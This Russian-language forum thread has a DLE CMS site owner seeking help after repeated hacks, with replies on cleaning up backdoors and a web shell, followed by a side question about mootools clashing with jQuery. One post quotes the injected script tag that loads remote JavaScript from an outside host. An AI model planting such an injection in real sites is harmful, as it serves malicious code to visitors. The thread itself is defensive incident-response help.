Перейти к публикации

Рекомендованные сообщения

Какой раз уже удаляю код, но они снова взламывают

<script language="JavaScript" charset="windows-1251" rel="nofollow" src="http://under-click.net/js/if.php?id=7778"></script>

это скрипт который прописали на сайте

стоит Dle 9 , где может быть дыра?

Ссылка на сообщение
Поделиться на других сайтах

Molderjkee,

Пользовались нелегальной копией скрипта до этого? У вас лицензии всего полтора дня.

Восстанавливайте все лицензионные оригинальные файлы скрипта на сервере, проверяйте антивирусом встроенном в админпанель и удаляйте все файлы на которые он укажет.

Ссылка на сообщение
Поделиться на других сайтах

да пользовался нелегальной версией

бекдоры в них обычное дело, после замены всех файлов, не забудьте сменить все пароли, в том числе и на MySQL и FTP. проверьте тщательно настройки групп и всех пользователей кто имеет доступ в админпанель, чтобы не было лишних. Если были сторонние модули, то не ставьте их повторно.

Скорее всего на сервере теперь есть шелл, его нужно найти и удалить

Ссылка на сообщение
Поделиться на других сайтах

вот скрин, что нашёл антивирусник

c3060496799a.png

Значит вируса нету?

последний файл фото думаю вирус, так как его нету в папке , где он может быть?

Изменено пользователем Molderjkee
Ссылка на сообщение
Поделиться на других сайтах

Я никак не могу понять почему одни файлы подсвечивает красным, а другие синим. В этом есть какая-то логика? Объясните пожалуйста, кто знает :unsure:

Заранее спасибо за ответ ;)

Ссылка на сообщение
Поделиться на других сайтах

Я никак не могу понять почему одни файлы подсвечивает красным, а другие синим. В этом есть какая-то логика? Объясните пожалуйста, кто знает

Степень предполагаемой опасности, зависит от размера файла, например файлы шеллов маленькими не бывают, поэтому оони выделяются синим или красным цветом, в зависимости от размера. Но это вовсе не означает что зеленые файлы безопасны.

короче нашёл вирус в файле foto_156982.php

там нашёл Web Shell

вам нужно удалять все файлы на которые указывает антивирус, и которые не принадлежат скрипту, шелл могли залить и через эти сторонние модули.

Ссылка на сообщение
Поделиться на других сайтах

вот еще вопрос , у меня скрипты есть на JS , но не знаю что делать , так как они мне нужны и из-за этих скриптов не работает панель html при добавление новостей

Ссылка на сообщение
Поделиться на других сайтах

celsoft, меню которое раскладывается оно как бы блокирует другие скрипты

вот скрипт

<script language="javascript" src="{THEME}/css/mootools.js" type="text/javascript"></script>

<script language="javascript" src="{THEME}/css/slimbox.js" type="text/javascript"></script>

<script language="javascript" src="{THEME}/css/js/yt_tools.js" type="text/javascript"></script>

<script language="javascript" src="{THEME}/css/js/base.js" type="text/javascript"></script>

<script language="javascript" src="{THEME}/css/js/morph.js" type="text/javascript"></script>

<script language="javascript" src="{THEME}/css/js/accordionmenu.js" type="text/javascript"></script>

<script language="javascript" src="{THEME}/css/js/slidepanel.js" type="text/javascript"></script>

<script language="javascript" src="{THEME}/css/js/styleswitcher.js" type="text/javascript"></script>

<script language="javascript" src="{THEME}/css/js/spotlight.js" type="text/javascript"></script>

<!--[if lt IE 7]>

<script language="javascript" defer src="/templates/loom/lib/js/yt_ie6fix.js" type="text/javascript"></script>

<![endif]-->

<script type="text/javascript" src="{THEME}/css/mw_hint.js"></script>

может есть какой не будь способ не убирая их , сделать чтобы работало?

Изменено пользователем Molderjkee
Ссылка на сообщение
Поделиться на других сайтах

<script language="javascript" src="{THEME}/css/mootools.js" type="text/javascript"></script>

фреймворк mootols несовместим с Jquery который используется в скрипте, вам необходимо заменить плагины этого фреймворка на аналогичные плагины для Jquery.

Ссылка на сообщение
Поделиться на других сайтах

Присоединяйтесь к обсуждению

Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.

Гость
Ответить в тему...

×   Вставлено в виде отформатированного текста.   Вставить в виде обычного текста

  Разрешено не более 75 эмодзи.

×   Ваша ссылка была автоматически встроена.   Отобразить как ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставить изображения напрямую. Загрузите или вставьте изображения по ссылке.

×
×
  • Создать...